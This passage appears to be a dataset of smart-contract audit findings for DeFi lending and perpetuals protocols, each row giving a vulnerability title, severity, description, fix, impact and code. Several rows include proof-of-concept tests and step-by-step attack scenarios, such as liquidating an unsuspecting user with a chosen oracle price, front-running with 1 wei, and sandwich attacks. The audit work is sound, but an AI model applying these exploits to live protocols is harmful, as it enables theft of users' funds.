complicated.","After ANY bad debt, the protocol collateral for all non-negative users will be higher than protocol funds available, which can cause a bank run and a loss of funds for the users who are the last to withdraw.\\nEven if someone covers the shortfall for the user with negative collateral, this doesn't guarantee absence of bank run:\\nIf the shortfall is not covered quickly for any reason, the other users can notice disparency between collateral and funds in the protocol and start to withdraw\\nIt is possible that bad debt is so high that any entity (""insurance fund"") just won't have enough funds to cover it.","```\\nit('panprog bad debt liquidation bankrun', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.01'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('500')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n dsu.transferFrom.whenCalledWith(userC.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userC).update(userC.address, parse6decimal('50.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('10')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('10.000'), 0, collateral, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral before liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n // liquidate\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('10')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(user.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('90', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n await market.connect(userC).update(userC.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(user.address);\\n var infoB = await market.locals(userB.address);\\n var infoC = await market.locals(userC.address);\\n console.log(""collateral after liquidation: "" + info.collateral + "" + "" + infoB.collateral + "" + "" + infoC.collateral + "" = "" + \\n info.collateral.add(infoB.collateral).add(infoC.collateral));\\n})\\n```\\n" +Market: DoS when stuffed with pending protected positions,medium,"In `_invariant`, there is a limit on the number of pending position updates. But for `protected` position updates, `_invariant` returns early and does not trigger this check.\\n```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n\\nAfter the `_invariant` check, the postion updates will be added into pending position queues.\\n```\\n _invariant(context, account, newOrder, collateral, protected);\\n\\n // store\\n _pendingPosition[context.global.currentId].store(context.currentPosition.global);\\n _pendingPositions[account][context.local.currentId].store(context.currentPosition.local);\\n```\\n\\nWhen the protocol enters next oracle version, the global pending queue `_pendingPosition` will be settled in a loop.\\n```\\n function _settle(Context memory context, address account) private {\\n // rest of code.\\n // settle\\n while (\\n context.global.currentId != context.global.latestId &&\\n (nextPosition = _pendingPosition[context.global.latestId + 1].read()).ready(context.latestVersion)\\n ) _processPositionGlobal(context, context.global.latestId + 1, nextPosition);\\n```\\n\\nThe OOG revert happens if there are too many pending position updates.\\nThis revert will happend on every `update` calls because they all need to settle this `_pendingPosition` before `update`.\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n _settle(context, account);\\n _update(context, account, newMaker, newLong, newShort, collateral, protect);\\n _saveContext(context, account);\\n }\\n```\\n","Either or both,\\nLimit the number of pending protected position updates can be queued in `_invariant`.\\nLimit the number of global pending protected postions can be settled in `_settle`.","The protocol will be fully unfunctional and funds will be locked. There will be no recover to this DoS.\\nA malicious user can tigger this intentionally at very low cost. Alternatively, this can occur during a volatile market period when there are massive liquidations.","```\\n function _invariant(\\n Context memory context,\\n address account,\\n Order memory newOrder,\\n Fixed6 collateral,\\n bool protected\\n ) private view {\\n // rest of code.\\n\\n if (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n // rest of code.\\n if (\\n context.global.currentId > context.global.latestId + context.marketParameter.maxPendingGlobal ||\\n context.local.currentId > context.local.latestId + context.marketParameter.maxPendingLocal\\n ) revert MarketExceedsPendingIdLimitError();\\n // rest of code.\\n }\\n```\\n" +It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no cost,medium,"The user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done on existing position or on a new position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount or open a new position with minimum allowed collateral 3.2. Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).\\nThe scenario of liquidating unsuspecting user is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await market.positions(userB.address);\\n console.log(""Liquidated maker: collateral = "" + info.collateral + "" maker = "" + pos.maker);\\n\\n})\\n```\\n\\nConsole output for the code:\\n```\\nLiquidated maker: collateral = 99980000 maker = 0\\n```\\n\\nSelf liquidation is the same, just the liquidator does this in 1 transaction and is owned by userB.","Industry standard is to have initial margin (margin required to open position or withdraw collateral) and maintenance margin (margin required to keep the position solvent). Initial margin > maintenance margin and serves exactly for the reason to prevent users from being close to liquidation, intentional or not. I suggest to implement initial margin as a measure to prevent such self liquidation or unsuspected user liquidations. This will improve user experience (remove a lot of surprise liquidations) and will also improve security by disallowing intentional liquidations and cheaply overcoming the protocol limits such as efficiency limit: intentional liquidations are never good for the protocol as they're most often malicious, so having the ability to liquidate yourself in 1 transaction should definetely be prohibited.","There are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.\\nJust open long/short position from different accounts and wait for the large price update and frontrun it by withdrawing max collateral from the position which will be in a loss, and immediately liquidate it in the same transaction: with large price update one position will be liquidated with bad debt while the other position will be in a large profit, total profit from both positions will be positive and basically risk-free, meaning it's at the expense of the other users. While this strategy is possible to do on its own, liquidation in the same transaction allows it to be more profitable and catch more opportunities, meaning more damage to the other protocol users.\\nThe same core reason can also cause unsuspecting user to be unexpectedly liquidated in the following scenario:\\nUser opens position (10 ETH long at $1000, with $10000 collateral). User is choosing very safe leverage = 1. Market maintenance is set to 20% (max leverage = 5)\\nSome time later the price is still $1000 and user decides to close most of his position and withdraw collateral, so he reduces his position to 2 ETH long and withdraws $8000 collateral, leaving his position with $2000 collateral. It appears that the user is at the safe leverage = 1 again.\\nRight in the same block the liquidator commits non-requested oracle with a price $999.999 and immediately liquidates the user.\\nThe user is unsuspectedly liquidated even though he thought that he was at leverage = 1. But since collateral is withdrawn immediately, but position changes only later, user actually brought his position to max leverage and got liquidated. While this might be argued to be the expected behavior, it might still be hard to understand and unintuitive for many users, so it's better to prevent such situation from happening and the fix is the same as the one to fix self-liquidations.","```\\nit('panprog liquidate unsuspecting user / self in 1 transaction', async () => {\\n\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n var riskParameter = {\\n maintenance: parse6decimal('0.2'),\\n takerFee: parse6decimal('0.00'),\\n takerSkewFee: 0,\\n takerImpactFee: 0,\\n makerFee: parse6decimal('0.00'),\\n makerImpactFee: 0,\\n makerLimit: parse6decimal('1000'),\\n efficiencyLimit: parse6decimal('0.2'),\\n liquidationFee: parse6decimal('0.50'),\\n minLiquidationFee: parse6decimal('10'),\\n maxLiquidationFee: parse6decimal('1000'),\\n utilizationCurve: {\\n minRate: parse6decimal('0.0'),\\n maxRate: parse6decimal('1.00'),\\n targetRate: parse6decimal('0.10'),\\n targetUtilization: parse6decimal('0.50'),\\n },\\n pController: {\\n k: parse6decimal('40000'),\\n max: parse6decimal('1.20'),\\n },\\n minMaintenance: parse6decimal('10'),\\n virtualTaker: parse6decimal('0'),\\n staleAfter: 14400,\\n makerReceiveOnly: false,\\n }\\n var marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: parse6decimal('0'),\\n makerRewardRate: parse6decimal('0'),\\n longRewardRate: parse6decimal('0'),\\n shortRewardRate: parse6decimal('0'),\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n }\\n \\n await market.connect(owner).updateRiskParameter(riskParameter);\\n await market.connect(owner).updateParameter(marketParameter);\\n\\n setupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\n var collateral = parse6decimal('1000')\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, collateral, false)\\n\\n var collateral = parse6decimal('100')\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, collateral, false)\\n\\n // settle\\n setupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\n await market.connect(userB).update(userB.address, parse6decimal('10.000'), 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, parse6decimal('1.000'), 0, 0, false)\\n\\n // withdraw\\n var collateral = parse6decimal('800')\\n dsu.transfer.whenCalledWith(userB.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, parse6decimal('2.000'), 0, 0, collateral.mul(-1), false)\\n\\n // liquidate unsuspecting user\\n setupOracle('100.01', TIMESTAMP + 150, TIMESTAMP + 200);\\n const EXPECTED_LIQUIDATION_FEE = parse6decimal('100.01')\\n dsu.transfer.whenCalledWith(liquidator.address, EXPECTED_LIQUIDATION_FEE.mul(1e12)).returns(true)\\n dsu.balanceOf.whenCalledWith(market.address).returns(COLLATERAL.mul(1e12))\\n await market.connect(liquidator).update(userB.address, 0, 0, 0, EXPECTED_LIQUIDATION_FEE.mul(-1), true)\\n\\n setupOracle('100.01', TIMESTAMP + 200, TIMESTAMP + 300);\\n await market.connect(userB).update(userB.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n var pos = await market.positions(userB.address);\\n console.log(""Liquidated maker: collateral = "" + info.collateral + "" maker = "" + pos.maker);\\n\\n})\\n```\\n" +update() wrong privilege control,medium,"in `OracleFactory.update()` will call `oracle.update()`\\n```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n\\nBut `oracle.update()` permission is needed for `OracleFactory.owner()` and not `OracleFactory` itself.\\n```\\n function update(IOracleProvider newProvider) external onlyOwner {\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n\\n modifier onlyOwner {\\n if (msg.sender != factory().owner()) revert InstanceNotOwnerError(msg.sender);\\n _;\\n }\\n```\\n\\nThis results in `OracleFactory` not being able to do `update()`. Suggest changing the limit of `oracle.update()` to `factory()`.","```\\ncontract Oracle is IOracle, Instance {\\n// rest of code\\n\\n- function update(IOracleProvider newProvider) external onlyOwner {\\n+ function update(IOracleProvider newProvider) external {\\n+ require(msg.sender == factory(),""invalid sender"");\\n _updateCurrent(newProvider);\\n _updateLatest(newProvider.latest());\\n }\\n```\\n",`OracleFactory.update()` unable to add `IOracleProvider`,"```\\ncontract OracleFactory is IOracleFactory, Factory {\\n// rest of code\\n function update(bytes32 id, IOracleProviderFactory factory) external onlyOwner {\\n if (!factories[factory]) revert OracleFactoryNotRegisteredError();\\n if (oracles[id] == IOracleProvider(address(0))) revert OracleFactoryNotCreatedError();\\n\\n IOracleProvider oracleProvider = factory.oracles(id);\\n if (oracleProvider == IOracleProvider(address(0))) revert OracleFactoryInvalidIdError();\\n\\n IOracle oracle = IOracle(address(oracles[id]));\\n oracle.update(oracleProvider);\\n }\\n```\\n" +`_accumulateFunding()` maker will get the wrong amount of funding fee.,medium,"The formula that calculates the amount of funding in `Version#_accumulateFunding()` on the maker side is incorrect. This leads to an incorrect distribution of funding between the minor and the maker's side.\\n```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n\\nPoC\\nGiven:\\nlong/major: 1000\\nshort/minor: 1\\nmaker: 1\\nThen:\\nskew(): 999/1000\\nfundingMaker: 0.999 of the funding\\nfundingShort: 0.001 of the funding\\nWhile the maker only matches for `1` of the major part and contributes to half of the total short side, it takes the entire funding.","The correct formula to calculate the amount of funding belonging to the maker side should be:\\n```\\nfundingMakerRatio = min(maker, major - minor) / min(major, minor + maker)\\nfundingMaker = fundingMakerRatio * fundingMinor\\n```\\n",,```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n +CurveTricryptoOracle incorrectly assumes that WETH is always the last token in the pool which leads to bad LP pricing,high,"CurveTricryptoOracle.sol#L53-L63\\n```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 ethPrice = base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n\\nWhen calculating LP prices, CurveTricryptoOracle#getPrice always assumes that WETH is the second token in the pool. This isn't the case which will cause the LP to be massively overvalued.\\nThere are 6 tricrypto pools currently deployed on mainnet. Half of these pools have an asset other than WETH as token[2]:\\n```\\n 0x4ebdf703948ddcea3b11f675b4d1fba9d2414a14 - CRV\\n 0x5426178799ee0a0181a89b4f57efddfab49941ec - INV\\n 0x2889302a794da87fbf1d6db415c1492194663d13 - wstETH\\n```\\n",There is no need to assume that WETH is the last token. Simply pull the price for each asset and input it into lpPrice.,LP will be massively overvalued leading to overborrowing and protocol insolvency,"```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 ethPrice = base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n" +ConvexSpell/CurveSpell.openPositionFarm will revert in some cases,medium,"The fix for this issue from this contest is as following:\\n```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n\\nThe key to this issue is that `borrowBalance` may be smaller than `IERC20Upgradeable(borrowToken).balanceOf(address(this))`. For simplicity, assume that CurveSpell supports an lptoken which contains two tokens : A and B.\\nBob transferred 1wei of A and B to the CurveSpell contract. Alice opens a position by calling `BlueBerryBank#execute`, and the flow is as follows:\\nenter `CurveSpell#openPositionFarm`.\\ncall `_doLend` to deposit isolated collaterals.\\ncall `_doBorrow` to borrow 100e18 A token. borrowBalance = 100e18.\\n`A.approve(pool, 100e18)`.\\n`suppliedAmts[0] = A.balance(address(this)) = 100e18+1wei`, `suppliedAmts[1] = 0`.\\ncall `ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint)`, then revert because the approved amount is not enough.\\nTherefore, no one can successfully open a position.\\nOf course, bob can also transfer 1wei of `borrowToken` to contract by front-running `openPositionFarm` for a specific user or all users.","The following fix is for CurveSpell, but please don't forget ConvexSpell.\\nTwo ways for fix it:\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -108,9 +108,7 @@ contract CurveSpell is BasicSpell {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -119,9 +117,7 @@ contract CurveSpell is BasicSpell {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -130,9 +126,7 @@ contract CurveSpell is BasicSpell {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n```\\n\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -103,7 +103,8 @@ contract CurveSpell is BasicSpell {\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n- _ensureApprove(param.borrowToken, pool, borrowBalance);\\n+ require(borrowBalance <= IERC20Upgradeable(borrowToken).balanceOf(address(this)), ""impossible"");\\n+ _ensureApprove(param.borrowToken, pool, IERC20Upgradeable(borrowToken).balanceOf(address(this)));\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n```\\n",`ConvexSpell/CurveSpell.openPositionFarm` will revert due to this issue.,"```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n" +Mainnet oracles are incompatible with wstETH causing many popular yields strategies to be broken,medium,"ChainlinkAdapterOracle.sol#L111-L125\\n```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n\\nChainlinkAdapterOracle only supports single asset price data. This makes it completely incompatible with wstETH because chainlink doesn't have a wstETH oracle on mainnet. Additionally Band protocol doesn't offer a wstETH oracle either. This only leaves Uniswap oracles which are highly dangerous given their low liquidity.",Create a special bypass specifically for wstETH utilizing the stETH oracle and it's current exchange rate.,Mainnet oracles are incompatible with wstETH causing many popular yields strategies to be broken,"```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n" +AuraSpell#closePositionFarm exits pool with single token and without any slippage protection,medium,"AuraSpell.sol#L221-L236\\n```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n\\nWhen exiting a the balancer vault, closePositionFarm makes a subcall to _getExitPoolParams which is used to set minAmountsOut.\\nAuraSpell.sol#L358-L361\\n```\\n (address[] memory tokens, , ) = wAuraPools.getPoolTokens(lpToken);\\n\\n uint256 length = tokens.length;\\n uint256[] memory minAmountsOut = new uint256[](length);\\n```\\n\\nInside _getExitPoolParams we see that minAmountsOut are always an empty array. This means that the user has no slippage protection and can be sandwich attacked, suffering massive losses.",Allow user to specify min amount received from exit,Exits can be sandwich attacked causing massive loss to the user,"```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 